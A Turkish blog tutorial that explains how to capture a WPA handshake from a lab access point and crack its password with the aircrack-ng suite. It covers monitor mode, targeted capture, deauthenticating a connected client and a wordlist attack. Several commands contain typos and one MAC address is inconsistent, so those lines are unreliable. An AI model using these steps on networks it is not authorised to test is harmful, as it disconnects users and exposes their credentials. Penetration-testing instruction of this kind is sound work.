aircrack-ng Aracı Kullanılarak WPA Handshake Trafiğindeki Parolanın Sözlük Saldırısı ile Elde Edilmesi

Kablosuz ağ sızma testlerinde kimlik doğrulama mekanizmasının güvenilir bir şekilde işletilmemesi bir takım zayıflıklara sebep olmaktadır. Bu yazıda WPA şifrelemesi kullanılan bir ağ trafiği analiz edilecek ve ele geçirilen handshake trafiğindeki parola sözlük saldırısı ile elde edilecektir.

Kablosuz ağ trafiğinin yakalanması saldırının gerçekleştirileceği bilgisayarın (Kali) kablosuz ağ erişiminin olması gereklidir. Fiziksel bilgisayarın kablosuz ağ kartı varsa; Kali işletim sistemi bu bilgisayara kurulabilir veya canlı (live) başlatılabilir. Bunun yanında USB gibi bağdaştırıcı desteği olan bir donanım (kablosuz ağ kartı) da kullanılabilir. Kablosuz ağ kartı sanal Kali bilgisayarına yeni bir aygıt olarak tanımlanarak çevredeki kablosuz ağ trafiği okunabilir. VMware Workstation uygulamasında sanal makine özelliklerinde “Removable Devices > Kablosuz Ağ Aygıtı > Connect” adımları izlenerek kablosuz cihaz, sanal bilgisayara tanıtılabilir.

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-01

Kali işletim sisteminde kablosuz ağ trafiğini yakalama ve analiz etmek için airmon-ng komutu kullanılabilir.

airmon-ng

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-02

Kablosuz ağ trafiğinin arasına girilerek paket yakalanacağı için, kablosuz ağ arayüzü dinleme/monitor modunda başlatılmalıdır.

airmon-ng start wlan0

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-03

Monitör moda alındıktan sonra, airodum-ng aracı ile ortamdaki kablosuz ağlar dinlenir ve saldırının gerçekleştirileceği kablosuz ağa ait SSID tespit edilir.

airodum-ng mon0

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-04

Listedeki “test-lab” adlı Access Point’e saldırı gerçekleştirilecektir.

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-05

Seçilen AP’e gerçekleştirilen talepler/trafik/handshake yakalanacaktır. Bu amaçla, AP’in yayın yaptığı kanal numarası, AP’in MAC adresi airodump-ng aracına parametre olarak verilir.

airodump-ng -w /root/Desktop/demo/test-lab –encrypt wpa -c 11 –bssid B4:3A:2B:9C:08:E0 –ignore-negative-one mon0

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-06

Böylece mevcut trafik elde edilmektedir.

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-07

Handshake paketinin yakalanması için AP’e yeni bir bağlantının gerçekleşmesi beklenmelidir veya bağlı olan istemcinin bağlantısı koparılarak (deauthenticate) yeniden bağlantı talebinde bulunması sağlanmalıdır.

airoplay-ng -0 20 -a B4:3A:28:9C:08:E0 -c B8:98:F7:81:9E:C7 –ignore-negative-one mon0

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-08

İstemci AP’e yeniden bağlantı gerçekleştirmek istediğinde WPA handshake yakalanır ve handshake’e ait bu paket “-w” parametre ile belirtilen dizine kaydolmuş olur.

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-09

Elde edilen bu paket içerisinde kimlik bilgileri bulunmaktadır. Parola bilgisini açık olarak elde edebilmek için, sözlük saldırısı gerçekleştirilebilir.

aircrack-ng -w /root/Desktop/sifre/sifrem.txt /root/Desktop/demo/test-lab-02.cap

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-10

Sözlük içerisinde AP parolası varsa, doğru parola elde edilmiş olur.

cracking-wpa-handshake-traffic-using-dictionary-and-aircrack-ng-tool-11

 

Yazarın Bilgileri

Yılmaz Karakul
Yılmaz Karakul

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.